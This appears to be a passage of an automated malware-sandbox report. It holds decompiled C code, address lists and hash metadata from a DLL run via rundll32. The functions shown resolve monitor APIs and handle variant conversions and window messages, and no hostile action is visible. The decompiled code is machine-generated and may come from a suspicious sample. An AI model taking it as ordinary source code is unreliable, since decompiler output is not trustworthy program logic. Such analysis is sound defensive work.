									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                                  0x1002db49
                                                                                                                                  0x1002db50
                                                                                                                                  0x1002db55
                                                                                                                                  0x1002db58
                                                                                                                                  0x1002db5c
                                                                                                                                  0x1002e035
                                                                                                                                  0x1002e03a
                                                                                                                                  0x1002e03a
                                                                                                                                  0x1002db62
                                                                                                                                  0x1002db65
                                                                                                                                  0x1002db68
                                                                                                                                  0x1002db6b
                                                                                                                                  0x1002db75
                                                                                                                                  0x1002db78
                                                                                                                                  0x1002db7d
                                                                                                                                  0x1002db83
                                                                                                                                  0x1002db8e
                                                                                                                                  0x1002db8e
                                                                                                                                  0x1002db95
                                                                                                                                  0x1002db9c
                                                                                                                                  0x1002dba1
                                                                                                                                  0x1002dba8
                                                                                                                                  0x1002dba8
                                                                                                                                  0x1002dbab
                                                                                                                                  0x1002dbb2
                                                                                                                                  0x1002dbb5
                                                                                                                                  0x1002dbb8
                                                                                                                                  0x1002dbbb
                                                                                                                                  0x1002dbbe
                                                                                                                                  0x1002dbc1
                                                                                                                                  0x1002dbc5
                                                                                                                                  0x1002dbc9
                                                                                                                                  0x1002dbca
                                                                                                                                  0x1002ddea
                                                                                                                                  0x1002ddee
                                                                                                                                  0x1002ddf0
                                                                                                                                  0x1002ddf9
                                                                                                                                  0x1002ddfb
                                                                                                                                  0x1002ddfb
                                                                                                                                  0x1002de08
                                                                                                                                  0x1002de10
                                                                                                                                  0x1002de12
                                                                                                                                  0x1002de27
                                                                                                                                  0x1002de3e
                                                                                                                                  0x1002de41
                                                                                                                                  0x1002de46
                                                                                                                                  0x1002de4b
                                                                                                                                  0x1002de76
                                                                                                                                  0x1002de76
                                                                                                                                  0x1002de79
                                                                                                                                  0x1002de82
                                                                                                                                  0x1002de85
                                                                                                                                  0x1002df5a
                                                                                                                                  0x1002df5a
                                                                                                                                  0x1002df60
                                                                                                                                  0x1002e017
                                                                                                                                  0x1002e01a
                                                                                                                                  0x1002e01e
                                                                                                                                  0x1002e023
                                                                                                                                  0x1002e027
                                                                                                                                  0x1002e02a
                                                                                                                                  0x1002e02c
                                                                                                                                  0x1002e02f
                                                                                                                                  0x1002e034
                                                                                                                                  0x00000000
                                                                                                                                  0x1002e02a
                                                                                                                                  0x1002df6a
                                                                                                                                  0x1002df8f
                                                                                                                                  0x1002df92
                                                                                                                                  0x1002df95
                                                                                                                                  0x1002df98
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002df9a
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfab
                                                                                                                                  0x1002dfb2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002e00f
                                                                                                                                  0x1002e012
                                                                                                                                  0x1002e015
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfca
                                                                                                                                  0x1002dfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfd4
                                                                                                                                  0x1002dfd7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfb7
                                                                                                                                  0x1002dfba
                                                                                                                                  0x1002dfbd
                                                                                                                                  0x1002dfbf
                                                                                                                                  0x1002dfc2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfe1
                                                                                                                                  0x1002dfe6
                                                                                                                                  0x1002dfe9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dff1
                                                                                                                                  0x1002dff4
                                                                                                                                  0x1002dff6
                                                                                                                                  0x1002dffa
                                                                                                                                  0x1002dffd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002e001
                                                                                                                                  0x1002e004
                                                                                                                                  0x1002e007
                                                                                                                                  0x1002e008
                                                                                                                                  0x1002e009
                                                                                                                                  0x1002e00a
                                                                                                                                  0x1002e00b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dfa7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002df9a
                                                                                                                                  0x1002df6e
                                                                                                                                  0x1002df73
                                                                                                                                  0x1002df79
                                                                                                                                  0x1002df7b
                                                                                                                                  0x1002df7d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002df83
                                                                                                                                  0x1002df89
                                                                                                                                  0x1002dea1
                                                                                                                                  0x1002dea1
                                                                                                                                  0x1002dea6
                                                                                                                                  0x1002dea6
                                                                                                                                  0x1002dea9
                                                                                                                                  0x1002deb2
                                                                                                                                  0x1002deb2
                                                                                                                                  0x1002deb7
                                                                                                                                  0x1002debd
                                                                                                                                  0x1002dec0
                                                                                                                                  0x1002dec2
                                                                                                                                  0x1002dec6
                                                                                                                                  0x1002dec8
                                                                                                                                  0x1002ded0
                                                                                                                                  0x1002ded1
                                                                                                                                  0x1002ded7
                                                                                                                                  0x1002ded7
                                                                                                                                  0x1002ded9
                                                                                                                                  0x1002dedf
                                                                                                                                  0x1002dee5
                                                                                                                                  0x1002deed
                                                                                                                                  0x1002def5
                                                                                                                                  0x1002def8
                                                                                                                                  0x1002def8
                                                                                                                                  0x1002df03
                                                                                                                                  0x1002df09
                                                                                                                                  0x1002df0b
                                                                                                                                  0x1002df12
                                                                                                                                  0x1002df17
                                                                                                                                  0x1002df1a
                                                                                                                                  0x1002df1a
                                                                                                                                  0x1002df22
                                                                                                                                  0x1002df24
                                                                                                                                  0x1002df2b
                                                                                                                                  0x1002df30
                                                                                                                                  0x1002df33
                                                                                                                                  0x1002df33
                                                                                                                                  0x1002df3b
                                                                                                                                  0x1002df40
                                                                                                                                  0x1002df46
                                                                                                                                  0x1002df52
                                                                                                                                  0x1002df55
                                                                                                                                  0x00000000
                                                                                                                                  0x1002df55
                                                                                                                                  0x1002de8f
                                                                                                                                  0x1002de95
                                                                                                                                  0x1002de9c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de9e
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de4d
                                                                                                                                  0x1002de50
                                                                                                                                  0x1002de56
                                                                                                                                  0x1002de71
                                                                                                                                  0x1002de71
                                                                                                                                  0x1002de74
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de5c
                                                                                                                                  0x1002de5e
                                                                                                                                  0x1002de60
                                                                                                                                  0x1002de66
                                                                                                                                  0x1002de67
                                                                                                                                  0x1002de6d
                                                                                                                                  0x1002de6d
                                                                                                                                  0x1002de70
                                                                                                                                  0x1002de70
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de70
                                                                                                                                  0x1002de62
                                                                                                                                  0x1002de64
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de64
                                                                                                                                  0x00000000
                                                                                                                                  0x1002de71
                                                                                                                                  0x1002dbd0
                                                                                                                                  0x1002dbd4
                                                                                                                                  0x1002dbd5
                                                                                                                                  0x1002dbe4
                                                                                                                                  0x1002dbef
                                                                                                                                  0x1002dbf2
                                                                                                                                  0x1002dbfa
                                                                                                                                  0x1002dbfd
                                                                                                                                  0x1002dc00
                                                                                                                                  0x1002dc06
                                                                                                                                  0x1002dc06
                                                                                                                                  0x1002dc0a
                                                                                                                                  0x1002dc0d
                                                                                                                                  0x1002dc10
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc16
                                                                                                                                  0x1002dc1b
                                                                                                                                  0x1002dc1e
                                                                                                                                  0x1002dc24
                                                                                                                                  0x1002dc27
                                                                                                                                  0x1002dc2a
                                                                                                                                  0x1002dc2d
                                                                                                                                  0x1002dc33
                                                                                                                                  0x1002dc36
                                                                                                                                  0x1002dc39
                                                                                                                                  0x1002dc43
                                                                                                                                  0x1002dc43
                                                                                                                                  0x1002dc46
                                                                                                                                  0x1002dc4e
                                                                                                                                  0x1002dc50
                                                                                                                                  0x1002dd6d
                                                                                                                                  0x1002dd72
                                                                                                                                  0x1002dd75
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd77
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd7e
                                                                                                                                  0x1002dd81
                                                                                                                                  0x1002dd83
                                                                                                                                  0x1002dd89
                                                                                                                                  0x1002dd93
                                                                                                                                  0x1002dd9a
                                                                                                                                  0x1002dd9c
                                                                                                                                  0x1002dda8
                                                                                                                                  0x1002ddac
                                                                                                                                  0x1002ddb1
                                                                                                                                  0x1002ddb5
                                                                                                                                  0x1002ddb9
                                                                                                                                  0x1002ddbb
                                                                                                                                  0x1002ddbe
                                                                                                                                  0x1002ddc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc56
                                                                                                                                  0x1002dc56
                                                                                                                                  0x1002ddc6
                                                                                                                                  0x1002ddc6
                                                                                                                                  0x1002ddc9
                                                                                                                                  0x1002ddc9
                                                                                                                                  0x1002ddcd
                                                                                                                                  0x00000000
                                                                                                                                  0x1002ddcd
                                                                                                                                  0x1002dc5d
                                                                                                                                  0x1002dc61
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc67
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc7c
                                                                                                                                  0x1002dc7f
                                                                                                                                  0x1002dc81
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dca4
                                                                                                                                  0x1002dca8
                                                                                                                                  0x1002dcad
                                                                                                                                  0x1002dcb0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcb7
                                                                                                                                  0x1002dcbb
                                                                                                                                  0x1002dcc0
                                                                                                                                  0x1002dcc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcca
                                                                                                                                  0x1002dccd
                                                                                                                                  0x1002dccf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcd3
                                                                                                                                  0x1002dcd6
                                                                                                                                  0x1002dcd8
                                                                                                                                  0x1002dcda
                                                                                                                                  0x1002dcdb
                                                                                                                                  0x1002dcde
                                                                                                                                  0x1002dce4
                                                                                                                                  0x1002dce8
                                                                                                                                  0x1002dcea
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcf0
                                                                                                                                  0x1002dcf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd45
                                                                                                                                  0x1002dd48
                                                                                                                                  0x1002dd4c
                                                                                                                                  0x1002dd4e
                                                                                                                                  0x1002dd50
                                                                                                                                  0x1002dd50
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd55
                                                                                                                                  0x1002dd59
                                                                                                                                  0x1002dd5c
                                                                                                                                  0x1002dd5f
                                                                                                                                  0x1002dd61
                                                                                                                                  0x1002dd62
                                                                                                                                  0x1002dd63
                                                                                                                                  0x1002dd64
                                                                                                                                  0x1002dd65
                                                                                                                                  0x1002dd68
                                                                                                                                  0x1002dd6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcfd
                                                                                                                                  0x1002dcfd
                                                                                                                                  0x1002dd00
                                                                                                                                  0x1002dd02
                                                                                                                                  0x1002dd04
                                                                                                                                  0x1002dd05
                                                                                                                                  0x1002dd08
                                                                                                                                  0x1002dd0b
                                                                                                                                  0x1002dd10
                                                                                                                                  0x1002dd13
                                                                                                                                  0x1002dd17
                                                                                                                                  0x1002dd1d
                                                                                                                                  0x1002dd21
                                                                                                                                  0x1002dd23
                                                                                                                                  0x1002dd29
                                                                                                                                  0x1002dd29
                                                                                                                                  0x1002dd2c
                                                                                                                                  0x1002dd2f
                                                                                                                                  0x1002dd32
                                                                                                                                  0x1002dd37
                                                                                                                                  0x1002dd3b
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd3b
                                                                                                                                  0x1002dd25
                                                                                                                                  0x1002dd27
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc6e
                                                                                                                                  0x1002dc71
                                                                                                                                  0x1002dc75
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc89
                                                                                                                                  0x1002dc8c
                                                                                                                                  0x1002dc8f
                                                                                                                                  0x1002dc92
                                                                                                                                  0x1002dc92
                                                                                                                                  0x1002dc95
                                                                                                                                  0x1002dc95
                                                                                                                                  0x1002dc97
                                                                                                                                  0x1002dc9c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc67
                                                                                                                                  0x1002ddcf
                                                                                                                                  0x1002ddcf
                                                                                                                                  0x1002ddd3
                                                                                                                                  0x1002ddd6
                                                                                                                                  0x1002dddf
                                                                                                                                  0x1002dddf
                                                                                                                                  0x1002dde8
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dde8

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4128688680-0
                                                                                                                                  • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                  • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                  • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                  • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                                  0x10018b5c
                                                                                                                                  0x10018b62
                                                                                                                                  0x10018b71
                                                                                                                                  0x10018b7d
                                                                                                                                  0x10018b88
                                                                                                                                  0x10018b8a
                                                                                                                                  0x10018b8c
                                                                                                                                  0x10018c20
                                                                                                                                  0x10018c20
                                                                                                                                  0x10018c26
                                                                                                                                  0x10018c2c
                                                                                                                                  0x10018c32
                                                                                                                                  0x10018c38
                                                                                                                                  0x10018c3e
                                                                                                                                  0x10018c44
                                                                                                                                  0x10018c4a
                                                                                                                                  0x10018b92
                                                                                                                                  0x10018b9e
                                                                                                                                  0x10018ba0
                                                                                                                                  0x10018ba2
                                                                                                                                  0x10018ba7
                                                                                                                                  0x00000000
                                                                                                                                  0x10018ba9
                                                                                                                                  0x10018baf
                                                                                                                                  0x10018bb1
                                                                                                                                  0x10018bb3
                                                                                                                                  0x10018bb8
                                                                                                                                  0x00000000
                                                                                                                                  0x10018bba
                                                                                                                                  0x10018bc0
                                                                                                                                  0x10018bc2
                                                                                                                                  0x10018bc4
                                                                                                                                  0x10018bc9
                                                                                                                                  0x00000000
                                                                                                                                  0x10018bcb
                                                                                                                                  0x10018bd1
                                                                                                                                  0x10018bd3
                                                                                                                                  0x10018bd5
                                                                                                                                  0x10018bda
                                                                                                                                  0x00000000
                                                                                                                                  0x10018bdc
                                                                                                                                  0x10018be2
                                                                                                                                  0x10018be4
                                                                                                                                  0x10018be6
                                                                                                                                  0x10018beb
                                                                                                                                  0x00000000
                                                                                                                                  0x10018bed
                                                                                                                                  0x10018bf3
                                                                                                                                  0x10018bf5
                                                                                                                                  0x10018bf7
                                                                                                                                  0x10018bfc
                                                                                                                                  0x00000000
                                                                                                                                  0x10018bfe
                                                                                                                                  0x10018c04
                                                                                                                                  0x10018c06
                                                                                                                                  0x10018c08
                                                                                                                                  0x10018c0d
                                                                                                                                  0x00000000
                                                                                                                                  0x10018c0f
                                                                                                                                  0x10018c11
                                                                                                                                  0x10018c11
                                                                                                                                  0x10018c11
                                                                                                                                  0x10018c0d
                                                                                                                                  0x10018bfc
                                                                                                                                  0x10018beb
                                                                                                                                  0x10018bda
                                                                                                                                  0x10018bc9
                                                                                                                                  0x10018bb8
                                                                                                                                  0x10018ba7
                                                                                                                                  0x10018c14
                                                                                                                                  0x10018c1f
                                                                                                                                  0x10018b64
                                                                                                                                  0x10018b66
                                                                                                                                  0x10018b70
                                                                                                                                  0x10018b70

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                  • API String ID: 667068680-68207542
                                                                                                                                  • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                  • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                                  • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                  • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1002A5D5(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E100199B2(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E10017B95( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
